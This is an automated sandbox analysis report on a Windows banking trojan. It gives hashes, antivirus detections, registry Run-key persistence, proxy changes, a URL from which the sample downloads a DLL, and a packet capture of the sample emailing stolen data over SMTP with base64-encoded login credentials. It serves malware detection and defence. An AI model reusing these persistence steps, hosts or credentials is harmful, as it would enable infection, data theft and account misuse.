Analysis Date2014-03-27 10:29:20
MD5773c7d8f6bdc22e33de7cca40a0549e2
SHA1445eca22fac8968ee347e953261b8e6148b11a20

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: b705b96e253da557e73373d697b34fb1 sha1: 75e3750d2f964793ee4cb25fc755062e8231e1a6 size: 117760
Section.rsrc md5: 155bf3cc0f1989fa5c363823069bf8cf sha1: 8b017842bb13ef0f61023a50abf7c3516daa7b1d size: 5632
Timestamp2005-12-30 13:40:19
VersionLegalCopyright: Microsoft Corporation
InternalName: shoop5
FileVersion: ..55
CompanyName: Microsoft Corporation
LegalTrademarks: Microsoft Corporation
Comments: shoop5
ProductName: shoop5
ProductVersion: ..55
FileDescription: shoop5.exe
OriginalFilename: shoop5.exe
PackerPECompact 2.0x Heuristic Mode -> Jeremy Collake
PEhashc303db1492fbb24701fce2d8d5c887bb233fd573
IMPhash09d0478591d4f788cb3e5ea416c25237
AVclamavTrojan.Spy.Banker-981
AVavgPSW.Banker.YVX
AVaviraTR/Crypt.FKM.Gen
AVmcafeePWS-Banker

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Filec:\windows\paityom35.exe
Creates Processc:\windows\paityom35.exe

Process
↳ c:\windows\paityom35.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Service System ➝
"c:\windows\paityom35.exe"\\x00
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Run\Service System ➝
"c:\windows\paityom35.exe"\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File\Device\Afd\AsyncSelectHlp
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\ieupdate.dat
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DFE3F3.tmp
Winsock DNSwww.supernet.speedserv.com
Winsock URLhttp://www.supernet.speedserv.com/downloads/winlockdll.dll

Network Details:

DNSsmtp.mail.eu.am0.yahoodns.net
Type: A
188.125.69.59
DNSwww.supernet.speedserv.com
Type: A
DNSsmtp.mail.yahoo.com.hk
Type: A
Flows TCP192.168.1.1:1032 ➝ 188.125.69.59:25
SMTPloryoyom30@pop.com.br

Raw Pcap
0x00000000 (00000)   48454c4f 20434f4d 50555445 522d5858   HELO COMPUTER-XX
0x00000010 (00016)   58585858 0d0a4155 5448204c 4f47494e   XXXX..AUTH LOGIN
0x00000020 (00032)   0d0a5a58 686c6347 68774e41 3d3d0d0a   ..ZXhlcGhwNA==..
0x00000030 (00048)   4e445533 4d7a4132 0d0a4d41 494c2046   NDU3MzA2..MAIL F
0x00000040 (00064)   524f4d3a 3c657865 70687034 40796168   ROM:<exephp4@yah
0x00000050 (00080)   6f6f2e63 6f6d2e68 6b3e0d0a 52435054   oo.com.hk>..RCPT
0x00000060 (00096)   20544f3a 3c636169 78617940 74657272    TO:<caixay@terr
0x00000070 (00112)   612e636f 6d3e0d0a 52435054 20544f3a   a.com>..RCPT TO:
0x00000080 (00128)   3c6c6f72 796f796f 6d333040 706f702e   <loryoyom30@pop.
0x00000090 (00144)   636f6d2e 62723e0d 0a444154 410d0a46   com.br>..DATA..F
0x000000a0 (00160)   726f6d3a 20434f4d 50555445 522d5858   rom: COMPUTER-XX
0x000000b0 (00176)   58585858 406f6f69 646f2e63 6f6d2e62   XXXX@ooido.com.b
0x000000c0 (00192)   720d0a54 6f3a2070 65676f75 646f6964   r..To: pegoudoid
0x000000d0 (00208)   6f406f6f 69646f2e 636f6d2e 62720d0a   o@ooido.com.br..
0x000000e0 (00224)   44617465 3a205468 75727364 6179202c   Date: Thursday ,
0x000000f0 (00240)   20323720 4d617220 32303134 2031303a    27 Mar 2014 10:
0x00000100 (00256)   31333a34 3520414d 0d0a5375 626a6563   13:45 AM..Subjec
0x00000110 (00272)   743a204e 6f766f48 6b203921 33212020   t: NovoHk 9!3!  
0x00000120 (00288)   32372f30 332f3134 2031303a 31330d0a   27/03/14 10:13..
0x00000130 (00304)   582d4d61 696c6572 3a204d69 63726f73   X-Mailer: Micros
0x00000140 (00320)   6f667420 436f7270 6f726174 696f6e20   oft Corporation 
0x00000150 (00336)   2d204d69 63726f73 6f66740d 0a0d0a20   - Microsoft.... 
0x00000160 (00352)   200d0a45 72726f3a 206e6f20 61677561    ..Erro: no agua
0x00000170 (00368)   72646f20 646f2070 61672e20 646f2064   rdo do pag. do d
0x00000180 (00384)   6f776e6c 6f61642c 20652076 61692070   ownload, e vai p
0x00000190 (00400)   61676172 2e2e2e0d 0a4d7367 20646120   agar.....Msg da 
0x000001a0 (00416)   76657273 e36f2e3a 20352e30 2e310d0a   vers.o.: 5.0.1..
0x000001b0 (00432)   0d0a2e0d 0a0d0a51 5549540d 0a         .......QUIT..


Strings